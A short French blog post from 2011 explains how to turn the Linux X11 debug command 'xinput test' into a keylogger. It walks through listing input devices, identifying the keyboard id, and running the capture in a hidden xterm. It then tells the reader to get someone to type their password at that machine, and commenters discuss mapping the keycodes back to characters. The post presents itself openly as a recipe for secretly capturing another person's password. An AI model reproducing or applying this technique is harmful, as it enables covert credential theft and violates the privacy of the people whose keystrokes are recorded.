samedi 22 octobre 2011

keylogger linux, tips&trick - small post

Souvent on a besoin d'un keylogger pour pouvoir récupérer un mot de passe. Sous un linux installé de manière standard, il est possible d'activer un programme de debug jouant très facilement le rôle de keylogger. Drame en quatre actes.

Premier acte, lister les xinput:

kevin@slackware:~$ xinput list
⎡ Virtual core pointer   id=2 [master pointer  (3)]
⎜   ↳ Virtual core XTEST pointer id=4 [slave  pointer  (2)]
⎜   ↳ USB Optical Mouse          id=8 [slave  pointer  (2)]
⎣ Virtual core keyboard          id=3 [master keyboard (2)]
    ↳ Virtual core XTEST keyboard id=5 [slave  keyboard (3)]
    ↳ Power Button                id=6 [slave  keyboard (3)]
    ↳ Power Button                id=7 [slave  keyboard (3)]
    ↳ Dell Dell QuietKey Keyboard id=9 [slave  keyboard (3)]


Deuxième acte, trouver le bon xinput attaché au clavier, nous pouvons tester avec le 5 et le 9 qui semblent de bons candidats:

kevin@slackware:~$ xinput test 5
  (frappes claviers... rien ne s'affiche)
^C
kevin@slackware:~$ xinput test 9
key release 36 
key press   24 
akey release 24 
key press   37 
key press   54 
^C
kevin@slackware:~$

C'est donc le xinput 9.

Troisième acte, ouvrir un xterm, taper xinput test 9, cacher le xterm quelque part, puis appeler quelqu'un a utiliser son poste et se débrouiller pour qu'il ait à taper son mot de passe à un moment ou à un autre.

Quatrième acte: Profit.

(EDIT: Merci A.K. pour les typo )

2 commentaires:

  1. Génial sauf qu'après tu dois décrypter tout cas!

    RépondreSupprimer
  2. @Anonyme: tu ne fais une table de correspondance qu'une seule fois.

    RépondreSupprimer